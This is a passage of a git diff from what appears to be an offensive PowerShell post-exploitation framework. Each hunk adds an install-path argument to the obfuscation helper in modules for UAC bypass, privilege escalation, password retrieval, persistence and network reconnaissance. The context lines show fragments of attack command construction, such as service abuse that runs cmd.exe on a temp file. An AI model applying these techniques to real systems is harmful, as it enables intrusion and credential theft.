obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -234,5 +234,5 @@ class Module: script += "'Schtasks persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/privesc/ask.py b/lib/modules/powershell/privesc/ask.py index a1bb865..83992a1 100644 --- a/lib/modules/powershell/privesc/ask.py +++ b/lib/modules/powershell/privesc/ask.py @@ -113,5 +113,5 @@ else { } ''' %(encLauncher) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/privesc/bypassuac.py b/lib/modules/powershell/privesc/bypassuac.py index f24cea2..2ecdaaf 100644 --- a/lib/modules/powershell/privesc/bypassuac.py +++ b/lib/modules/powershell/privesc/bypassuac.py @@ -115,6 +115,6 @@ class Module: else: scriptEnd = "Invoke-BypassUAC -Command \"%s\"" % (launcher) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/bypassuac_eventvwr.py b/lib/modules/powershell/privesc/bypassuac_eventvwr.py index fcbbb10..85fb4f2 100644 --- a/lib/modules/powershell/privesc/bypassuac_eventvwr.py +++ b/lib/modules/powershell/privesc/bypassuac_eventvwr.py @@ -110,6 +110,6 @@ class Module: else: scriptEnd = "Invoke-EventVwrBypass -Command \"%s\"" % (encScript) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py b/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py index 2ac1c2f..0606e5c 100644 --- a/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py +++ b/lib/modules/powershell/privesc/bypassuac_tokenmanipulation.py @@ -158,7 +158,7 @@ class Module: except Exception as e: pass if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) scriptEnd = "Invoke-BypassUACTokenManipulation -Arguments \"-w 1 -enc %s\"" % (encodedCradle) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/bypassuac_wscript.py b/lib/modules/powershell/privesc/bypassuac_wscript.py index 122d681..48649b2 100644 --- a/lib/modules/powershell/privesc/bypassuac_wscript.py +++ b/lib/modules/powershell/privesc/bypassuac_wscript.py @@ -112,6 +112,6 @@ class Module: else: scriptEnd = "Invoke-WScriptBypassUAC -payload \"%s\"" % (launcher) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/getsystem.py b/lib/modules/powershell/privesc/getsystem.py index c34f848..c8ebaf9 100644 --- a/lib/modules/powershell/privesc/getsystem.py +++ b/lib/modules/powershell/privesc/getsystem.py @@ -115,6 +115,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-System completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/gpp.py b/lib/modules/powershell/privesc/gpp.py index 8cdf96a..fbb929c 100644 --- a/lib/modules/powershell/privesc/gpp.py +++ b/lib/modules/powershell/privesc/gpp.py @@ -83,6 +83,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-GPPPassword completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/mcafee_sitelist.py b/lib/modules/powershell/privesc/mcafee_sitelist.py index 33a4a51..dc07331 100644 --- a/lib/modules/powershell/privesc/mcafee_sitelist.py +++ b/lib/modules/powershell/privesc/mcafee_sitelist.py @@ -82,6 +82,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-SiteListPassword completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/ms16-032.py b/lib/modules/powershell/privesc/ms16-032.py index bc740b2..a78fb84 100644 --- a/lib/modules/powershell/privesc/ms16-032.py +++ b/lib/modules/powershell/privesc/ms16-032.py @@ -101,6 +101,6 @@ class Module: scriptEnd = 'Invoke-MS16032 -Command "' + launcherCode + '"' scriptEnd += ';`nInvoke-MS16032 completed.' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/ms16-135.py b/lib/modules/powershell/privesc/ms16-135.py index 5ce5527..7700817 100644 --- a/lib/modules/powershell/privesc/ms16-135.py +++ b/lib/modules/powershell/privesc/ms16-135.py @@ -102,5 +102,5 @@ class Module: script += 'Invoke-MS16135 -Command "' + launcherCode + '"' script += ';`nInvoke-MS16135 completed.' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/privesc/powerup/allchecks.py b/lib/modules/powershell/privesc/powerup/allchecks.py index d299c2d..31dd7c4 100644 --- a/lib/modules/powershell/privesc/powerup/allchecks.py +++ b/lib/modules/powershell/privesc/powerup/allchecks.py @@ -85,6 +85,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/find_dllhijack.py b/lib/modules/powershell/privesc/powerup/find_dllhijack.py index 190f421..326d3f2 100644 --- a/lib/modules/powershell/privesc/powerup/find_dllhijack.py +++ b/lib/modules/powershell/privesc/powerup/find_dllhijack.py @@ -100,6 +100,6 @@ class Module: scriptEnd += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_exe_restore.py b/lib/modules/powershell/privesc/powerup/service_exe_restore.py index 5d3b979..d7c00d9 100644 --- a/lib/modules/powershell/privesc/powerup/service_exe_restore.py +++ b/lib/modules/powershell/privesc/powerup/service_exe_restore.py @@ -95,6 +95,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_exe_stager.py b/lib/modules/powershell/privesc/powerup/service_exe_stager.py index c752eee..83da5b2 100644 --- a/lib/modules/powershell/privesc/powerup/service_exe_stager.py +++ b/lib/modules/powershell/privesc/powerup/service_exe_stager.py @@ -128,6 +128,6 @@ class Module: else: scriptEnd += "\nInstall-ServiceBinary -ServiceName \""+str(serviceName)+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C $tempLoc\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_exe_useradd.py b/lib/modules/powershell/privesc/powerup/service_exe_useradd.py index f966dfe..2e2e1fe 100644 --- a/lib/modules/powershell/privesc/powerup/service_exe_useradd.py +++ b/lib/modules/powershell/privesc/powerup/service_exe_useradd.py @@ -106,6 +106,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_stager.py b/lib/modules/powershell/privesc/powerup/service_stager.py index 1585cfd..044fb8f 100644 --- a/lib/modules/powershell/privesc/powerup/service_stager.py +++ b/lib/modules/powershell/privesc/powerup/service_stager.py @@ -121,6 +121,6 @@ class Module: scriptEnd += "Invoke-ServiceAbuse -ServiceName \""+serviceName+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C `\"$env:Temp\\debug.bat`\"\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_useradd.py b/lib/modules/powershell/privesc/powerup/service_useradd.py index df9701b..3ed8c4e 100644 --- a/lib/modules/powershell/privesc/powerup/service_useradd.py +++ b/lib/modules/powershell/privesc/powerup/service_useradd.py @@ -104,6 +104,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/write_dllhijacker.py b/lib/modules/powershell/privesc/powerup/write_dllhijacker.py index e77e177..d123d4e 100644 --- a/lib/modules/powershell/privesc/powerup/write_dllhijacker.py +++ b/lib/modules/powershell/privesc/powerup/write_dllhijacker.py @@ -122,6 +122,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/tater.py b/lib/modules/powershell/privesc/tater.py index ff525c9..e46df21 100644 --- a/lib/modules/powershell/privesc/tater.py +++ b/lib/modules/powershell/privesc/tater.py @@ -155,6 +155,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/recon/find_fruit.py b/lib/modules/powershell/recon/find_fruit.py index dbca367..65f0b7a 100644 --- a/lib/modules/powershell/recon/find_fruit.py +++ b/lib/modules/powershell/recon/find_fruit.py @@ -127,6 +127,6 @@ class Module: scriptEnd += " | Format-Table -AutoSize | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/recon/get_sql_server_login_default_pw.py b/lib/modules/powershell/recon/get_sql_server_login_default_pw.py index 948c69a..943ed5b 100644 --- a/lib/modules/powershell/recon/get_sql_server_login_default_pw.py +++ b/lib/modules/powershell/recon/get_sql_server_login_default_pw.py @@ -102,6 +102,6 @@ class Module: if instance != "" and not check_all: scriptEnd += " -Instance "+instance if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script \ No newline at end of file diff --git a/lib/modules/powershell/recon/http_login.py b/lib/modules/powershell/recon/http_login.py index b74f5b1..2b39a7d 100644 --- a/lib/modules/powershell/recon/http_login.py +++ b/lib/modules/powershell/recon/http_login.py @@ -127,6 +127,6 @@ class Module: scriptEnd += " | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/antivirusproduct.py b/lib/modules/powershell/situational_awareness/host/antivirusproduct.py index 3d58f84..db0f2c8 100644 --- a/lib/modules/powershell/situational_awareness/host/antivirusproduct.py +++ b/lib/modules/powershell/situational_awareness/host/antivirusproduct.py @@ -101,5 +101,5 @@ Get-AntiVirusProduct """ script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(self.info["Name"])+' completed!";' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/computerdetails.py b/lib/modules/powershell/situational_awareness/host/computerdetails.py index 1c51f85..808a3ef 100644 --- a/lib/modules/powershell/situational_awareness/host/computerdetails.py +++ b/lib/modules/powershell/situational_awareness/host/computerdetails.py @@ -107,7 +107,7 @@ class Module: scriptEnd += 'Write-Output "Event ID 4624 (Logon):`n";' scriptEnd += "Write-Output $Filtered4624.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "4648": @@ -115,7 +115,7 @@ class Module: scriptEnd += 'Write-Output "Event ID 4648 (Explicit Credential Logon):`n";' scriptEnd += "Write-Output $Filtered4648.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "AppLocker": @@ -123,7 +123,7 @@ class Module: scriptEnd += 'Write-Output "AppLocker Process Starts:`n";' scriptEnd += "Write-Output $AppLockerLogs.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "PSLogs": @@ -131,7 +131,7 @@ class Module: scriptEnd += 'Write-Output "PowerShell Script Executions:`n";' scriptEnd += "Write-Output $PSLogs.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "SavedRDP": @@ -139,13 +139,13 @@ class Module: scriptEnd += 'Write-Output "RDP Client Data:`n";' scriptEnd += "Write-Output $RdpClientData.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script # if we get to this point, no switched were specified scriptEnd += "Get-ComputerDetails -Limit " + str(self.options['Limit']['Value']) + " -ToString" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/dnsserver.py b/lib/modules/powershell/situational_awareness/host/dnsserver.py index acdcdae..8c9b0a2 100644 --- a/lib/modules/powershell/situational_awareness/host/dnsserver.py +++ b/lib/modules/powershell/situational_awareness/host/dnsserver.py @@ -101,5 +101,5 @@ function Get-SystemDNSServer else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py b/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py index 364d877..cb6feda 100644 --- a/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py +++ b/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py @@ -82,6 +82,6 @@ class Module: script = moduleCode scriptEnd = "Find-TrustedDocuments" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/get_pathacl.py b/lib/modules/powershell/situational_awareness/host/get_pathacl.py index 00ab99a..5511c2b 100644 --- a/lib/modules/powershell/situational_awareness/host/get_pathacl.py +++ b/lib/modules/powershell/situational_awareness/host/get_pathacl.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/get_proxy.py b/lib/modules/powershell/situational_awareness/host/get_proxy.py index 71eecb6..fe5997a 100644 --- a/lib/modules/powershell/situational_awareness/host/get_proxy.py +++ b/lib/modules/powershell/situational_awareness/host/get_proxy.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py b/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py index 1939a24..e749366 100644 --- a/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py +++ b/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py @@ -116,6 +116,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/paranoia.py b/lib/modules/powershell/situational_awareness/host/paranoia.py index 253971e..4540894 100644 --- a/lib/modules/powershell/situational_awareness/host/paranoia.py +++ b/lib/modules/powershell/situational_awareness/host/paranoia.py @@ -103,6 +103,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/winenum.py b/lib/modules/powershell/situational_awareness/host/winenum.py index fd0583d..f8252c5 100644 --- a/lib/modules/powershell/situational_awareness/host/winenum.py +++ b/lib/modules/powershell/situational_awareness/host/winenum.py @@ -90,6 +90,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/arpscan.py b/lib/modules/powershell/situational_awareness/network/arpscan.py index 387b496..345372f 100644 --- a/lib/modules/powershell/situational_awareness/network/arpscan.py +++ b/lib/modules/powershell/situational_awareness/network/arpscan.py @@ -91,6 +91,6 @@ class Module: scriptEnd += " | Select-Object MAC, Address | ft -autosize | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/bloodhound.py b/lib/modules/powershell/situational_awareness/network/bloodhound.py index d080099..7506a5a 100644 --- a/lib/modules/powershell/situational_awareness/network/bloodhound.py +++ b/lib/modules/powershell/situational_awareness/network/bloodhound.py @@ -159,7 +159,7 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py b/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py index 4563d5a..99163e9 100644 --- a/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py +++ b/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py @@ -113,5 +113,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/get_spn.py b/lib/modules/powershell/situational_awareness/network/get_spn.py index 9fce9ca..b9c00f4 100644 --- a/lib/modules/powershell/situational_awareness/network/get_spn.py +++ b/lib/modules/powershell/situational_awareness/network/get_spn.py @@ -93,6 +93,6 @@ class Module: scriptEnd += " -List yes | Format-Table -Wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py b/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py index dbf5362..8996ab7 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py @@ -118,6 +118,6 @@ class Module: if udpTimeOut != "": scriptEnd += " -UDPTimeOut "+udpTimeOut if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py index 83c9bf9..ca86149 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py @@ -104,6 +104,6 @@ class Module: if instance != "" and not check_all: scriptEnd += " -Instance "+instance if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/portscan.py b/lib/modules/powershell/situational_awareness/network/portscan.py index 336e1bf..88f7617 100644 --- a/lib/modules/powershell/situational_awareness/network/portscan.py +++ b/lib/modules/powershell/situational_awareness/network/portscan.py @@ -142,6 +142,6 @@ class Module: scriptEnd += " | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py b/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py index 77f24df..4dcd3b2 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py @@ -103,5 +103,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py index 1e81f69..866fb8d 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py @@ -97,5 +97,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py index 6d7588d..60a1ad1 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py @@ -97,5 +97,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py index ab9a194..fd02dd9 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py @@ -112,5 +112,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py index 2ca9d6f..1d9179a 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py @@ -107,5 +107,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py b/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py index 675c30c..5e8328b 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py @@ -118,5 +118,5 @@ class Module: script += ' | Out-String | %{$_ + 